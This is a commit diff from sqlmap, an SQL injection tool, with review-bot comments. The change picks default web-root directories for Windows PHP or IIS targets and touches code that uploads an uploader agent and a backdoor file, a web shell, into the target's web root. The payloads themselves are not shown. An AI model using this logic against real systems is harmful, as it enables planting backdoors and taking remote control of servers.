important update regarding default directories

Miroslav Stampar 2010-02-25 15:22:41 +00:00
parent a10adcfe08
commit 0913d700a8
2 changed files with 19 additions and 14 deletions


@ -222,12 +222,15 @@ def getHtmlErrorFp():
return htmlParsed return htmlParsed
def getDocRoot(): def getDocRoot(webApi=None):
docRoot = None docRoot = None
pagePath = directoryPath(conf.path) pagePath = directoryPath(conf.path)
if kb.os == "Windows": if kb.os == "Windows":
defaultDocRoot = "C:/Inetpub/wwwroot/" if webApi == "php":
defaultDocRoot = "C:/xampp/htdocs/"
else:
defaultDocRoot = "C:/Inetpub/wwwroot/"
else: else:
defaultDocRoot = "/var/www/" defaultDocRoot = "/var/www/"
@ -270,11 +273,14 @@ def getDocRoot():
return docRoot return docRoot
def getDirs(): def getDirs(webApi=None):
directories = set() directories = set()
if kb.os == "Windows": if kb.os == "Windows":
defaultDirs = ["C:/Inetpub/wwwroot/", "C:/xampp/htdocs/"] if webApi == "php":
defaultDirs = ["C:/xampp/htdocs/"]
else:
defaultDirs = ["C:/Inetpub/wwwroot/"]
else: else:
defaultDirs = ["/var/www/"] defaultDirs = ["/var/www/"]
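Review bot: The Windows default-root choice is now written out twice, once in getDocRoot and once in getDirs, with the same `if webApi == "php"` test and the same two hard-coded paths, so the two functions can drift apart on the next edit. A single module-level mapping consulted by both would keep them in step. The new parameter also deserves a comment in each function, such as `# webApi: "php" selects the XAMPP root on Windows; any other value, including None, keeps the IIS root`. The non-Windows branch ignores webApi entirely, which is worth stating in the same comment. Both function bodies continue outside the hunks shown.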


@ -131,11 +131,6 @@ class Web:
self.checkDbmsOs() self.checkDbmsOs()
kb.docRoot = getDocRoot()
directories = getDirs()
directories = list(directories)
directories.sort()
infoMsg = "trying to upload the uploader agent" infoMsg = "trying to upload the uploader agent"
logger.info(infoMsg) logger.info(infoMsg)
@ -167,6 +162,11 @@ class Web:
elif int(choice) < 1 or int(choice) > 3: elif int(choice) < 1 or int(choice) > 3:
logger.warn("invalid value, it must be 1 or 3") logger.warn("invalid value, it must be 1 or 3")
kb.docRoot = getDocRoot(self.webApi)
directories = getDirs(self.webApi)
directories = list(directories)
directories.sort()
backdoorName = "tmpb%s.%s" % (randomStr(4), self.webApi) backdoorName = "tmpb%s.%s" % (randomStr(4), self.webApi)
backdoorStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi), backdoorName) backdoorStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi), backdoorName)
originalBackdoorContent = backdoorContent = backdoorStream.read() originalBackdoorContent = backdoorContent = backdoorStream.read()
@ -178,11 +178,10 @@ class Web:
# Upload the uploader agent # Upload the uploader agent
self.__webFileInject(uploaderContent, uploaderName, directory) self.__webFileInject(uploaderContent, uploaderName, directory)
requestDir = ntToPosixSlashes(directory).replace(ntToPosixSlashes(kb.docRoot), "/") requestDir = ntToPosixSlashes(directory).replace(ntToPosixSlashes(kb.docRoot), "/").replace("//", "/")
if isWindowsPath(requestDir): if isWindowsPath(requestDir):
requestDir = requestDir[2:] requestDir = requestDir[2:]
while requestDir.find('//') != -1: requestDir = normalizePath(requestDir)
requestDir = requestDir.replace('//', '/')
self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir) self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir)
self.webUploaderUrl = "%s/%s" % (self.webBaseUrl.rstrip('/'), uploaderName) self.webUploaderUrl = "%s/%s" % (self.webBaseUrl.rstrip('/'), uploaderName)
@ -203,9 +202,9 @@ class Web:
if self.webApi == "asp": if self.webApi == "asp":
runcmdName = "tmpe%s.exe" % randomStr(4) runcmdName = "tmpe%s.exe" % randomStr(4)
runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName) runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName)
match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage) match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)
if match: if match:
backdoorDirectory = match.group(1) backdoorDirectory = match.group(1)
else: else:
continue continue
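Review bot: The new `.replace("//", "/")` on the requestDir line is a single pass, so it only halves a run of slashes, whereas the removed `while` loop collapsed runs of any length. The result is now correct only if normalizePath, whose definition is not part of this diff, collapses them. If it does, the chained replace is redundant and the line can read `requestDir = ntToPosixSlashes(directory).replace(ntToPosixSlashes(kb.docRoot), "/")`. It is also worth confirming that normalizePath keeps forward slashes on every host platform, since requestDir is interpolated into webBaseUrl as a URL path rather than used as a filesystem path. The enclosing method starts and ends outside these hunks.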